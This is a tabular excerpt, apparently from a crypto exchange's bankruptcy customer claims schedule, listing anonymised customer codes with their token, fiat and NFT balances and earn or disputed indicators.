| 07342227 | | CUSDT[3], DOGE[1000.42504698], SHIB[200925.24819697], USD[0.57] | | |
| 07342228 | | USD[10.00] | | |
| 07342229 | | DOGE[5], GRT[2], TRX[1], USD[0.00] | | |
| 07342230 | | BTC[0], ETH[.00000001], ETHW[0.82680531], LINK[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07342231 | | BAT[.27616469], CUSDT[1], USD[0.00] | | |
| 07342232 | | USD[10.00] | | |
| 07342233 | | CUSDT[1], SHIB[1], TRX[760.60979576], USD[36.13] | Yes | |
| 07342234 | | USD[10.00] | | |
| 07342235 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342236 | | USD[0.00] | | |
| 07342237 | | BAT[1], CUSDT[5], DOGE[3], ETH[0.59567497], ETHW[0.59567497], SHIB[1], TRX[4], USD[0.00] | | |
| 07342238 | | BRZ[2], CUSDT[1], SHIB[1], TRX[3], USD[0.01] | | |
| 07342239 | | USD[10.00] | | |
| 07342240 | | USD[10.00] | | |
| 07342241 | | USD[0.00], USDT[0] | | |
| 07342243 | | USD[10.00] | | |
| 07342244 | | CUSDT[2], DOGE[.93383984], TRX[1], USD[0.06] | | |
| 07342245 | | USD[10.00] | | |
| 07342246 | | CUSDT[7], DOGE[3598.35676271], SOL[2.18693203], TRX[1], USD[0.00] | Yes | |
| 07342247 | | CUSDT[1], GRT[1], USD[1.29] | | |
| 07342248 | | DOGE[2973.50576371], USD[0.00] | Yes | |
| 07342249 | | CUSDT[1], DOGE[2], TRX[213.79030048], USD[0.00] | | |
| 07342252 | | BRZ[4], CUSDT[29], DOGE[472.51476569], TRX[8], USD[0.00] | | |
| 07342253 | | CUSDT[1], DOGE[12042.63091343], USD[10.00] | | |
| 07342254 | | CUSDT[1], DOGE[25.94153844], GRT[0], TRX[0], USD[0.00] | | |
| 07342255 | | DOGE[34323.61495443], SHIB[21], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07342256 | | BAT[1], BRZ[6], CUSDT[13], DOGE[2], ETH[.04904193], ETHW[.04904193], GRT[2], TRX[10], USD[0.73], USDT[1] | | |
| 07342257 | | DOGE[.92915707], TRX[1], USD[0.00] | | |
| 07342258 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07342259 | | USD[10.00] | | |
| 07342260 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07342261 | | USD[10.00] | | |
| 07342262 | | USD[10.00] | | |
| 07342263 | | USD[10.00] | | |
| 07342264 | | USD[10.00] | | |
| 07342265 | | CUSDT[1], USD[0.00] | | |
| 07342266 | | USD[10.00] | | |
| 07342267 | | CUSDT[2], DOGE[147.61176083], NFT [465161512131639007/Humpty Dumpty #635][1], USD[0.00] | | |
| 07342268 | | CUSDT[1], DOGE[1387.54666389], TRX[22.50052294], USD[0.00] | Yes | |
| 07342269 | | DOGE[.01335165], USD[0.00] | Yes | |
| 07342270 | | USD[10.00] | | |
| 07342271 | | USD[10.00] | | |
| 07342272 | | USD[10.00] | | |
| 07342274 | | USD[0.00] | Yes | |
| 07342275 | | BTC[0], DOGE[0], USD[10.00] | | |
| 07342276 | | USD[10.00] | | |
| 07342277 | | USD[10.00] | | |
| 07342278 | | BTC[.00301648], CUSDT[2], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07342279 | | BF_POINT[200], BTC[0], DOGE[0], KSHIB[0], SHIB[1], SOL[0.00002228], USD[0.00] | Yes | |
| 07342280 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07342281 | | CUSDT[1], SUSHI[.00007183], TRX[1], USD[0.00] | | |
| 07342282 | | USD[10.00] | | |
| 07342283 | | USD[10.00] | | |
| 07342285 | | USD[10.00] | | |
| 07342286 | | CUSDT[12.09096558], USD[0.00] | | |
| 07342287 | | CUSDT[1], DOGE[442.19036107], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07342288 | | USD[10.00] | | |
| 07342289 | | USD[10.00] | | |
| 07342290 | | USD[10.00] | | |
| 07342291 | | CUSDT[4], DOGE[0.00001931], TRX[1], USD[0.01] | | |
| 07342292 | | BRZ[4], CUSDT[5], MATIC[23.93170676], TRX[323.42514834], USD[0.00] | Yes | |
| 07342293 | | USD[10.00] | | |
| 07342294 | | DOGE[7.17409032], TRX[2], USD[0.01] | | |
| 07342295 | | CUSDT[6], NFT (368254744953398295/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #48)[1], NFT (391871173479230949/Rick Ross Collection #3)[1], SOL[.02791833], TRX[.0000416], USD[0.00] | | |
| 07342296 | | BF_POINT[300], CUSDT[1], DOGE[4130.46672714], USD[0.00] | | |
| 07342297 | | BTC[.00038243], CUSDT[1], DOGE[5], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07342298 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342299 | | USD[10.00] | | |
| 07342300 | | USD[10.00] | | |
| 07342301 | | USD[10.00] | | |
| 07342302 | | USD[10.00] | | |
| 07342303 | | USD[10.00] | | |
| 07342304 | | USD[11.10] | Yes | |
| 07342305 | | USD[10.00] | | |
| 07342306 | | USD[0.00] | | |
| 07342307 | | BAT[2], BRZ[1], CUSDT[1], DOGE[8.00921072], ETH[.52827821], ETHW[.52805649], GRT[85.02503945], NFT (302480692349619624/Saudi Arabia Ticket Stub #1961)[1], TRX[3], USD[0.00] | Yes | |
| 07342308 | | BRZ[0.00005656], DOGE[4], ETH[0], GRT[1], USD[0.00], USDT[0] | | |
| 07342309 | | USD[10.00] | | |
| 07342310 | | USD[10.00] | | |
| 07342311 | | USD[10.00] | | |
| 07342312 | | USD[0.00], USDT[0] | | |
| 07342313 | | BRZ[1], BTC[0], CUSDT[3], DOGE[28.08423028], ETH[0], ETHW[0], GRT[2.40015918], MATIC[1.69317877], SHIB[3105.65089024], SOL[0.27293000], SUSHI[2.52770562], TRX[31.02974557], UNI[0], USD[10.27] | Yes | |
| 07342314 | | USD[10.00] | | |
| 07342315 | | SHIB[896860.98654708], TRX[1], USD[0.00] | | |
| 07342316 | | NFT (307676195569313138/Stellar)[1], NFT (317918292195486058/Pot #69)[1], NFT (405448305180868419/I love money)[1], NFT (419360923109369139/Pot #1)[1], USD[0.01], USDT[0] | Yes | |
| 07342317 | | USD[10.00] | | |
| 07342318 | | BRZ[2], BTC[0], CUSDT[2], DOGE[1.00066963], LINK[.00529742], TRX[2], USD[0.26] | | |
| 07342319 | | BTC[0], DOGE[2], USD[0.00] | | |
| 07342320 | | USD[0.01] | | |
| 07342321 | | USD[0.01] | | |
| 07342322 | | USD[10.00] | | |
| 07342324 | | USD[10.00] | | |
| 07342326 | | CUSDT[1], DOGE[373.95914084], TRX[1], USD[19.00] | | |
| 07342327 | | USD[10.00] | | |
| 07342328 | | AUD[0.00], USD[0.00] | Yes | |
| 07342329 | | TRX[2], USD[0.00] | | |
| 07342330 | | USD[110.00] | | |
| 07342331 | | CUSDT[7], DOGE[400.14665305], GRT[1], SHIB[1067314.84765764], TRX[3.82803047], USD[42.16] | | |
| 07342332 | | BRZ[1], USD[0.01] | | |
| 07342333 | | USD[10.00] | | |
| 07342334 | | USD[10.00] | | |
| 07342335 | | DOGE[1.00004361], USD[95.89] | | |
| 07342337 | | USD[10.00] | | |
| 07342338 | | USD[0.00] | | |
| 07342339 | | USD[10.00] | | |
| 07342341 | | USD[10.00] | | |
| 07342342 | | CUSDT[2], TRX[2], USD[0.02] | | |
| 07342343 | | USD[10.00] | | |
| 07342344 | | USD[10.00] | | |
| 07342345 | | BTC[0.00000050], ETH[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07342346 | | USD[10.00] | | |
| 07342347 | | USD[10.00] | | |
| 07342348 | | USD[10.00] | | |
| 07342349 | | USD[10.00] | | |
| 07342350 | | BTC[0], DOGE[0], USD[0.01] | | |
| 07342351 | | BRZ[1], CUSDT[5], DOGE[0], TRX[2], USD[0.00] | | |
| 07342352 | | CUSDT[1], TRX[6], USD[0.11] | | |
| 07342353 | | BRZ[12], BTC[0], CUSDT[175.00003934], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07342355 | | USD[10.00] | | |
| 07342356 | | USD[10.00] | | |
| 07342357 | | ETH[.00543545], ETHW[.00543545], USD[0.00] | | |
| 07342358 | | AVAX[.00009544], BTC[.00000091], DOGE[0], ETH[.00000001], LINK[.00193744], NFT (461446469711364107/Entrance Voucher #2109)[1], TRX[18.63071801], USD[0.00], USDT[0] | | |
| 07342359 | | BRZ[2], CUSDT[29], DOGE[2], ETH[.99992714], ETHW[.99992714], GRT[1], TRX[12], USD[0.00], USDT[2] | | |
| 07342360 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07342361 | | CUSDT[1], GRT[10.26293879], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342362 | | USD[10.00] | | |
| 07342363 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07342364 | | USD[10.00] | | |
| 07342365 | | ETH[.00015154], ETHW[.00015154], USD[0.00] | | |
| 07342366 | | USD[10.00] | | |
| 07342367 | | USD[10.00] | | |
| 07342368 | | USD[10.00] | | |
| 07342369 | | DOGE[146.34331233], USD[0.00] | | |
| 07342370 | | DOGE[166.16432422], USD[0.00] | | |
| 07342371 | | USD[10.00] | | |
| 07342372 | | DOGE[176.73910963], USD[0.00] | | |
| 07342374 | | CUSDT[468.89183978], DOGE[3311.2005485], USD[0.00] | | |
| 07342375 | | USD[0.33] | | |
| 07342376 | | CUSDT[1], USD[0.00] | | |
| 07342377 | | USD[0.00] | | |
| 07342378 | | BRZ[1], CUSDT[4], DOGE[.0018882], TRX[1], USD[88.39] | | |
| 07342379 | | BTC[.00268719], CUSDT[3], DOGE[2], ETH[.16888178], ETHW[.16888178], TRX[1], USD[0.00], USDT[0] | | |
| 07342380 | | USD[10.00] | | |
| 07342381 | | USD[10.00] | | |
| 07342382 | | USD[10.00] | | |
| 07342383 | | USD[10.00] | | |
| 07342384 | | USD[10.00] | | |
| 07342385 | | CUSDT[4], USD[0.00] | | |
| 07342386 | | USD[10.00] | | |
| 07342387 | | USD[10.00] | | |
| 07342388 | | DOGE[8414.48830449], USD[0.15] | Yes | |
| 07342389 | | BRZ[1], CUSDT[1], TRX[4], USD[0.00] | | |
| 07342390 | | USD[10.00] | | |
| 07342391 | | TRX[1], USD[10.00] | | |
| 07342392 | | BRZ[1], CUSDT[1], DOGE[1.43610927], GRT[.87065854], TRX[5], USD[0.07] | | |
| 07342393 | | USD[10.00] | | |
| 07342394 | | USD[0.01] | | |
| 07342395 | | DOGE[1.00003244], USD[0.01] | | |
| 07342396 | | BTC[0], DOGE[1.00004257], USD[0.00] | | |
| 07342397 | | BAT[1], CUSDT[1], DOGE[1.10384386], TRX[1], USD[0.00], USDT[1.00417309] | | |
| 07342399 | | AVAX[0.00000869], BAT[0], BRZ[2], BTC[0], CUSDT[.0018596], DOGE[3], ETH[0], ETHW[0.18049544], GRT[12.40992811], LTC[0], MATIC[0.00015835], NFT [391197927130449048/Imola Ticket Stub #2058][1], SHIB[311.74572935], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07342400 | | DOGE[0], USD[0.00] | | |
| 07342401 | | USD[10.00] | | |
| 07342402 | | USD[10.00] | | |
| 07342403 | | GRT[.15743667], USD[0.00] | Yes | |
| 07342404 | | USD[0.00] | | |
| 07342405 | | USD[10.00] | | |
| 07342407 | | CUSDT[3], DOGE[7], SOL[6.08087152], TRX[1], USD[0.01] | | |
| 07342408 | | USD[10.00] | | |
| 07342409 | | USD[10.00] | | |
| 07342410 | | USD[10.00] | | |
| 07342411 | | BRZ[4], CUSDT[7], DOGE[3], LTC[1.33091972], TRX[3], USD[0.00] | Yes | |
| 07342412 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[2], USD[0.00] | | |
| 07342413 | | CUSDT[1], DOGE[521.88423941], USD[0.00] | | |
| 07342414 | | BTC[.00002898], CUSDT[1], DOGE[4.15853059], USD[0.00] | | |
| 07342415 | | USD[10.00] | | |
| 07342416 | | USD[10.00] | | |
| 07342417 | | USD[10.00] | | |
| 07342419 | | USD[10.00] | | |
| 07342420 | | USD[10.00] | | |
| 07342421 | | USD[10.00] | | |
| 07342422 | | USD[10.00] | | |
| 07342423 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342424 | | USD[10.00] | | |
| 07342425 | | DOGE[16.00910332], USD[0.00] | | |
| 07342426 | | TRX[1], USD[0.00] | | |
| 07342427 | | DAI[8.9078245], USD[1.00] | | |
| 07342428 | | DOGE[0], TRX[1], USD[125.45] | | |
| 07342429 | | USD[10.00] | | |
| 07342430 | | ETH[.00370729], ETHW[.00370729], USD[0.00] | | |
| 07342431 | | CUSDT[1], DOGE[3292.6876432], USD[0.00] | | |
| 07342432 | | USD[10.00] | | |
| 07342433 | | DOGE[1], USD[18.67] | | |
| 07342434 | | DOGE[1], SUSHI[0], USD[0.00] | Yes | |
| 07342436 | | SOL[0], SUSHI[0], USD[0.00], YFI[0] | | |
| 07342438 | | USD[10.00] | | |
| 07342439 | | DOGE[13.55738649], USD[0.00] | | |
| 07342440 | | USD[10.00] | | |
| 07342441 | | USD[10.00] | | |
| 07342442 | | BAT[0], BTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07342444 | | USD[10.00] | | |
| 07342445 | | USD[10.00] | | |
| 07342446 | | USD[10.71] | Yes | |
| 07342447 | | BTC[.00000001], SUSHI[0], USD[0.00] | Yes | |
| 07342448 | | USD[10.00] | | |
| 07342449 | | USD[10.00] | | |
| 07342450 | | USD[118.90] | Yes | |
| 07342451 | | USD[0.00], USDT[0] | | |
| 07342452 | | DOGE[165.42085464], TRX[1], USD[0.00] | | |
| 07342453 | | BTC[0], CUSDT[1], SUSHI[.81010521], USD[0.00], USDT[0] | Yes | |
| 07342454 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07342455 | | USD[10.00] | | |
| 07342456 | | USD[10.00] | | |
| 07342457 | | DOGE[0], USD[0.01] | | |
| 07342458 | | USD[10.00] | | |
| 07342459 | | BCH[0], BRZ[0], CUSDT[2], DOGE[0], GRT[2], LINK[0], TRX[2], USD[0.00], USDT[1] | | |
| 07342460 | | CUSDT[3], DOGE[1666.41923731], USD[0.00] | | |
| 07342461 | | BRZ[1], CUSDT[3], DOGE[0], GRT[1], SUSHI[1], TRX[2], USD[0.00], USDT[0] | | |
| 07342462 | | CUSDT[5], DOGE[1], SHIB[12326507.24242673], TRX[3], USD[0.00] | Yes | |
| 07342463 | | CAD[0.00], USD[0.05] | | |
| 07342464 | | USD[10.00] | | |
| 07342466 | | CUSDT[1], DOGE[141.36487504], USD[0.00] | | |
| 07342467 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07342468 | | USD[10.85] | Yes | |
| 07342469 | | USD[10.00] | | |
| 07342470 | | USD[10.00] | | |
| 07342471 | | USD[10.00] | | |
| 07342473 | | SHIB[3], SOL[0], TRX[1], USD[0.01] | | |
| 07342474 | | BAT[217.05895436], BRZ[3], BTC[.01043247], CUSDT[24], DOGE[60.39752807], EUR[796.57], LTC[5.47451928], SHIB[9], SOL[11.05603778], TRX[3384.62743458], USD[150.89] | Yes | |
| 07342475 | | USD[0.25] | Yes | |
| 07342476 | | USD[10.00] | | |
| 07342477 | | NFT (450205412332618993/88rising Sky Challenge - Coin #209)[1], NFT (495690752856340028/Coachella x FTX Weekend 2 #29710)[1], NFT (541551184685194790/Coachella x FTX Weekend 1 #6000)[1], USD[10.00] | | |
| 07342478 | | DOGE[20.11683455], USD[0.00] | | |
| 07342479 | | CUSDT[2], DOGE[1.56685892], TRX[2], USD[0.00] | | |
| 07342480 | | CUSDT[1], DOGE[256.47889343], USD[0.01] | Yes | |
| 07342481 | | BRZ[1], CUSDT[1412.84996376], DOGE[158.7485266], ETH[.00148562], ETHW[.00148562], TRX[1511.04161648], USD[0.53] | | |
| 07342482 | | USD[10.00] | | |
| 07342483 | | BF_POINT[300], CUSDT[1], DOGE[.00218642], SUSHI[.00079501], USD[0.00] | Yes | |
| 07342484 | | ETH[0], ETHW[0], EUR[0.00], SHIB[2], SOL[0], USD[0.00] | Yes | |
| 07342485 | | USD[10.00] | | |
| 07342486 | | BAT[1.0165555], BTC[.0002143], DOGE[369.15214051], USD[0.01] | Yes | |
| 07342487 | | DOGE[.15425764], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342488 | | CUSDT[2], SHIB[1], USD[0.00] | Yes | |
| 07342489 | | USD[10.00] | | |
| 07342490 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01] | | |
| 07342491 | | USD[10.00] | | |
| 07342493 | | CUSDT[6], TRX[3], USD[0.00] | | |
| 07342494 | | BTC[.00020408], DOGE[1.00040406], USD[0.00] | | |
| 07342495 | | TRX[1], USD[0.12], USDT[0] | | |
| 07342496 | | USD[0.00] | | |
| 07342497 | | USD[10.00] | | |
| 07342498 | | USD[0.00], USDT[0] | | |
| 07342500 | | USD[10.00] | | |
| 07342502 | | USD[10.00] | | |
| 07342503 | | CUSDT[1], DOGE[65.36781884], TRX[1], USD[0.00] | | |
| 07342504 | | USD[10.00] | | |
| 07342505 | | DOGE[434.6863285], ETH[.00719208], ETHW[.00719208], USD[0.00] | | |
| 07342508 | | USD[0.01] | | |
| 07342509 | | USD[10.00] | | |
| 07342510 | | CUSDT[2], DOGE[0.00000698], USD[0.98] | | |
| 07342511 | | USD[10.00] | | |
| 07342512 | | BAT[1], BRZ[2], CUSDT[7], TRX[2], USD[0.01], USDT[0] | | |
| 07342513 | | CUSDT[2], DOGE[109.15097789], USD[0.00] | | |
| 07342514 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07342515 | | BRZ[2], CUSDT[1], LINK[.29125789], USD[0.00] | | |
| 07342516 | | DOGE[4], SHIB[2], TRX[2], USD[0.00] | | |
| 07342517 | | BTC[.00384257], CUSDT[3], DOGE[8157.1670223], ETH[.00576332], ETHW[.00569492], SHIB[1654953.33209156], TRX[169.221169], USD[0.00] | Yes | |
| 07342518 | | USD[0.00] | | |
| 07342519 | | DOGE[2], USD[0.00] | | |
| 07342520 | | CUSDT[55.6794519], ETH[0], LTC[.04031134], MATIC[1.60605279], SHIB[4], SUSHI[.96481779], USD[0.00] | Yes | |
| 07342521 | | DOGE[140.04631321], USD[0.00] | Yes | |
| 07342522 | | USD[10.00] | | |
| 07342523 | | DOGE[134.38634892], USD[0.00] | | |
| 07342525 | | CUSDT[1], DOGE[1], TRX[168.99313887], USD[0.06] | | |
| 07342526 | | USD[10.00] | | |
| 07342527 | | USD[10.00] | | |
| 07342528 | | USD[11.04] | Yes | |
| 07342529 | | USD[10.00] | | |
| 07342530 | | USD[10.00] | | |
| 07342531 | | ETH[.00639319], ETHW[.00631105], USD[0.00] | Yes | |
| 07342532 | | DOGE[37.29111649], TRX[58.0514111], USD[0.03] | Yes | |
| 07342533 | | USD[10.00] | | |
| 07342534 | | BTC[.00019341], DOGE[3897.64172415], USD[0.00] | Yes | |
| 07342535 | | TRX[1], USD[0.00] | | |
| 07342536 | | BTC[0], CUSDT[3], DOGE[0], LINK[.00001947], SHIB[0], USD[0.00] | Yes | |
| 07342537 | | USD[10.00] | | |
| 07342538 | | DOGE[.00087077], USD[0.00] | | |
| 07342539 | | USD[10.00] | | |
| 07342540 | | CUSDT[1], DOGE[1.01635006], USD[0.00] | | |
| 07342541 | | DOGE[.993], NFT [333289197740076938/Founding Frens Lawyer #457][1], NFT [441656404511535714/Founding Frens Investor #529][1], NFT [561812502150268644/Founding Frens Lawyer #531][1], SOL[.00044528], USD[0.18], USDT[0] | | |
| 07342542 | | USD[10.00] | | |
| 07342543 | | BAT[2], BTC[0], CUSDT[2], DOGE[3], ETH[0], GRT[4], SOL[0], TRX[9], USD[0.00], USDT[8] | | |
| 07342544 | | USD[0.01], USDT[0] | | |
| 07342545 | | USD[0.01] | | |
| 07342546 | | USD[10.00] | | |
| 07342548 | | USD[10.00] | | |
| 07342549 | | USD[10.00] | | |
| 07342550 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07342551 | | BRZ[2], BTC[.00000004], CUSDT[7], DOGE[0], ETH[0], MATIC[.00030813], SHIB[1], SOL[0.00005776], TRX[5], USD[0.00] | Yes | |
| 07342552 | | USD[0.03] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342553 | | BRZ[2], CUSDT[9], GRT[0], SUSHI[0], UNI[0], USD[0.01] | Yes | |
| 07342554 | | USD[10.00] | | |
| 07342555 | | BRZ[8.84564359], BTC[0], CUSDT[5], DOGE[0], GRT[0], NFT (2917529155226990339/MagicEden Vaults)[1], NFT (327026717003274409/Frog #1783)[1], NFT (342726199589862106/MagicEden Vaults)[1], NFT (431771726423204491/Sigma Shark #2332)[1], NFT (531705779651991149/Cyber Frogs Ramen)[1], NFT (550463669727392077/MagicEden Vaults)[1], NFT (555698978758527258/MagicEden Vaults)[1], NFT (562035612574408201/MagicEden Vaults)[1], NFT (568285773101054926/Elysian - #3704)[1], SOL[.01130581], USD[0.00], USDT[0] | Yes | |
| 07342556 | | USD[10.00] | | |
| 07342557 | | BRZ[2], CUSDT[4], DOGE[.31288134], TRX[8.00087675], USD[449.37], USDT[.00997765] | Yes | |
| 07342558 | | USD[10.00] | | |
| 07342559 | | BRZ[1], BTC[0], DOGE[0], ETH[0], LTC[0], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07342560 | | USD[0.00], DOGE[0], ETH[0], ETHW[0], GRT[0], SOL[0], USD[0.88] | | |
| 07342561 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], SOL[0], USD[0.88] | Yes | |
| 07342562 | | BTC[.00190636], CUSDT[12], DOGE[518.97195265], ETH[.02883243], ETHW[.02847649], LTC[.35740999], TRX[2034.55086757], USD[0.00] | Yes | |
| 07342563 | | USD[10.00] | | |
| 07342564 | | BRZ[1], BTC[.00009502], DOGE[182.45452422], SHIB[1013033.66951565], USD[0.07] | Yes | |
| 07342565 | | BRZ[1], BTC[.00001284], CUSDT[5], DOGE[1001.99998196], NFT (318035430858645099/CONCERTELLO #4)[1], NFT (441951898990012614/CONCERTELLO #2)[1], SHIB[4613470.74641843], USD[0.82] | | |
| 07342566 | | USD[10.00] | | |
| 07342567 | | BRZ[1], CUSDT[2], SHIB[10767412.81491153], TRX[6], USD[74.40] | Yes | |
| 07342568 | | BAT[1], BRZ[2], CUSDT[1], DOGE[351.30014136], ETH[.39321615], ETHW[.39321615], SUSHI[28.58699445], TRX[7], USD[39.98], USDT[1] | | |
| 07342569 | | CUSDT[4], DOGE[1.01121621], TRX[1], USD[0.00] | Yes | |
| 07342570 | | USD[10.00] | | |
| 07342571 | | BRZ[0], BTC[0], CUSDT[1], DOGE[1], ETH[0], SHIB[0], SOL[0], SUSHI[0], USD[0.00], USDT[1.00000001] | | |
| 07342572 | | TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07342573 | | USD[10.00] | | |
| 07342574 | | USD[10.00] | | |
| 07342575 | | BAT[1], DOGE[167.47713542], USD[0.06] | | |
| 07342576 | | USD[0.01] | | |
| 07342577 | | USD[10.00] | | |
| 07342578 | | DOGE[1], USD[71.42], USDT[0] | | |
| 07342579 | | CUSDT[1], USD[0.01] | | |
| 07342580 | Contingent, Disputed | USD[0.00] | Yes | |
| 07342581 | | BAT[2.11466145], BRZ[1], CUSDT[2], ETHW[0.65165944], GRT[3.15550512], TRX[5], USD[0.00], USDT[2.2061575] | Yes | |
| 07342582 | | DOGE[1.00004543], USD[0.01] | | |
| 07342583 | | USD[10.00] | | |
| 07342585 | | BAT[2], BRZ[1], BTC[.00596014], CUSDT[5], DOGE[31102.85674966], GRT[1], TRX[5], USD[0.00], USDT[1] | | |
| 07342586 | | BRZ[1], BTC[0], CUSDT[13], DOGE[1], SOL[0], TRX[11], USD[0.00], USDT[0.00046905] | Yes | |
| 07342587 | | DOGE[22523.36811546], NFT (302903510277078160/Star of David)[1], TRX[30745.70907602], USD[109.35] | Yes | |
| 07342589 | | USD[10.00] | | |
| 07342590 | | CUSDT[2], DOGE[.9527132], TRX[1], USD[281.89] | | |
| 07342591 | | BAT[.00046969], DOGE[.0000414], GRT[.00077153], TRX[2.00036299], USD[0.01], USDT[0] | | |
| 07342592 | | USD[10.00] | | |
| 07342593 | | BRZ[1], DOGE[3555.30220692], USD[473.02] | | |
| 07342594 | | DOGE[159.02142034], USD[0.00] | | |
| 07342595 | | USD[10.00] | | |
| 07342596 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07342598 | | CUSDT[2], DOGE[499.58876565], ETH[.03424409], ETHW[.03424409], USD[0.00] | | |
| 07342601 | | BTC[.0012], NFT (317186318005811707/Entrance Voucher #2935)[1], NFT (407806461527844213/FTX - Off The Grid Miami #1279)[1], NFT (413430794093025895/Imola Ticket Stub #1614)[1], NFT (443939415781572241/Humpty Dumpty #1397)[1], NFT (573447453664457643/Barcelona Ticket Stub #556)[1], USD[0.61] | | |
| 07342602 | | SHIB[1], USD[0.01] | | |
| 07342603 | | CUSDT[1], USD[0.00] | Yes | |
| 07342604 | | CUSDT[3], USD[44.73] | Yes | |
| 07342605 | | USD[10.00] | | |
| 07342606 | | BRZ[7.11205684], BTC[0], CUSDT[22], DOGE[12072.09593178], ETH[0], SHIB[2], TRX[5], USD[0.00] | Yes | |
| 07342607 | | USD[10.00] | | |
| 07342608 | | USD[10.00] | | |
| 07342609 | | CUSDT[1], DOGE[2], ETH[0], ETHW[0], SUSHI[0], USD[10.00] | | |
| 07342610 | | BRZ[0], BTC[0.00000114], DOGE[0], ETH[0], GRT[0], USD[0.00] | | |
| 07342611 | | CUSDT[2], USD[0.00] | | |
| 07342612 | | BRZ[1], BTC[0.00000228], CUSDT[3], DOGE[8.00921072], ETH[.00000443], ETHW[.00000443], GRT[.00003177], TRX[7], USD[4.12] | Yes | |
| 07342613 | | TRX[234.21064826], USD[0.00] | Yes | |
| 07342614 | | DOGE[143.76921475], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342615 | | CUSDT[5], GRT[1.30699093], USD[0.00] | Yes | |
| 07342616 | | CUSDT[1], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07342617 | | USD[0.11] | | |
| 07342619 | | CUSDT[0], DOGE[2], GRT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07342620 | | BTC[.00021074], USD[0.00] | | |
| 07342621 | | USD[10.00] | | |
| 07342622 | | USD[0.00] | | |
| 07342624 | | USD[10.00] | | |
| 07342625 | | DOGE[3729.02933739], TRX[1], USD[10.00] | | |
| 07342626 | | USD[10.00] | | |
| 07342627 | | USD[10.00] | | |
| 07342628 | | USD[10.00] | | |
| 07342630 | | USD[10.00] | | |
| 07342631 | | ALGO[307.16595962], BRZ[1], CUSDT[1], DOGE[20541.23667075], PAXG[.02787554], SHIB[3], USD[937.16] | Yes | |
| 07342633 | | BTC[.00033127], CUSDT[10136.10318293], DOGE[5476.45176746], TRX[10255.7678478], USD[0.00] | | |
| 07342634 | | DOGE[20.22571125], USD[0.00] | | |
| 07342635 | | CUSDT[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07342636 | | USD[10.00] | | |
| 07342637 | | BTC[.00000002], CUSDT[9], DOGE[0], ETH[.00000014], ETHW[.00000014], LTC[0.00000298], NFT (448267096291507598/Echo #6)[1], SHIB[8.04770536], TRX[6], USD[0.00] | Yes | |
| 07342638 | | CUSDT[1], ETH[.00639935], ETHW[.00631727], SOL[.07437658], USD[0.00] | Yes | |
| 07342639 | | BRZ[9.37566383], CUSDT[5], DOGE[17.27869155], NFT (293612223543570813/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #23)[1], NFT (296329473679484918/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #27)[1], NFT (350660595824851647/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #19)[1], NFT (421170905246832859/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #24)[1], NFT (423299327610493435/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #69)[1], NFT (436990797745380809/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #16)[1], NFT (503442758408644360/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #63)[1], NFT (533060501087395237/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #21)[1], SHIB[17], TRX[10], USD[0.00], USDT[1.02543198] | Yes | |
| 07342640 | | BTC[0], DOGE[0], ETH[.00000001], USD[0.00] | | |
| 07342641 | | USDT[0] | | |
